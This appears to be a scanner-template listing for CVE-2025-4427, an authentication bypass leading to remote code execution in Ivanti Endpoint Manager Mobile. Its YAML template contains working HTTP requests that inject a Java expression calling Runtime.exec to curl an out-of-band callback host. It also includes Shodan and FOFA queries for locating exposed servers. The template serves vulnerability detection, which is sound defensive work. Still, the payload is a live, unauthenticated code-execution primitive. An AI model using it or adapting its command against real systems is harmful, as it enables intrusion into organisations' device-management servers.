Ivanti Endpoint Manager Mobile - Unauthenticated Remote Code Execution
CVE-2025-4427
Verified
Description
An authentication bypass in Ivanti Endpoint Manager Mobile allowing attackers to access protected resources without proper credentials. This leads to unauthenticated Remote Code Execution via unsafe userinput in one of the bean validators which is sink for Server-Side Template Injection.
Severity
Critical
CVSS Score
5.3
Exploit Probability
1%
Affected Product
endpoint_manager_mobile
Published Date
May 15, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
+1
CVE-2025-4427.yaml
id: CVE-2025-4427 info: name: Ivanti Endpoint Manager Mobile - Unauthenticated Remote Code Execution author: iamnoooob,rootxharsh,parthmalhotra,pdresearch severity: critical description: | An authentication bypass in Ivanti Endpoint Manager Mobile allowing attackers to access protected resources without proper credentials. This leads to unauthenticated Remote Code Execution via unsafe userinput in one of the bean validators which is sink for Server-Side Template Injection. reference: - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2025-4427 cwe-id: CWE-288 epss-score: 0.00942 epss-percentile: 0.75063 metadata: verified: true max-request: 2 vendor: ivanti product: endpoint_manager_mobile shodan-query: http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" tags: cve,cve2025,ivanti,epmm,rce,ssti,kev http: - raw: - | GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d HTTP/1.1 Host: {{Hostname}} - | GET /api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "Format 'Process[pid=" - "localizedMessage" condition: and - type: word part: interactsh_protocol words: - dns - type: status status: - 400 # digest: 4b0a00483046022100c06c67c67d53a450303fbac63bd2d4af96c826c5df4df276f716d96b49be1831022100a60fe8adb99d5197d9fc143d39d30337df5de132e2f190e72bf33c36637e5714:922c64590222798bb761d5b6d8e72950
5.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2025-4427
CWE ID:
cwe-288